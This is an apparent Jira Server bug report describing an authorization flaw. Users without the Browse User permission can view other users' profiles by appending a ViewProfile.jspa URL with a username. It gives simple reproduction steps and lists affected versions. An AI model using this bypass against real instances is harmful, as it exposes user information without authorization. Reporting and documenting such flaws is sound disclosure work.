Details
-
Bug
-
Resolution: Timed out
-
Medium
-
None
-
7.5.1, 7.6.7, 7.10.2, 7.12.0
-
None
-
7.05
-
1
-
Severity 2 - Major
-
Description
Summary
When a non-admin user access JIRA and directly hit the URL (assuming that he knows other users' username), he would be able to view his/her profile though no Browse User permission is granted.
Steps to Reproduce
- Create a test user and grant an application access
- Ensure that no Browse User permission is granted to this user
- Access the Base URL and append secure/ViewProfile.jspa?name=anyusername at the end of the Base URL.
Expected Behavior
User is not able to view the profile.
Actual Result
User is able to see the other user's profile as long as he knows the username.
Workaround
None
Attachments
Issue Links
- relates to
-
JRASERVER-71899 Usernames are exposed in the URL while accessing user profiles
- Gathering Impact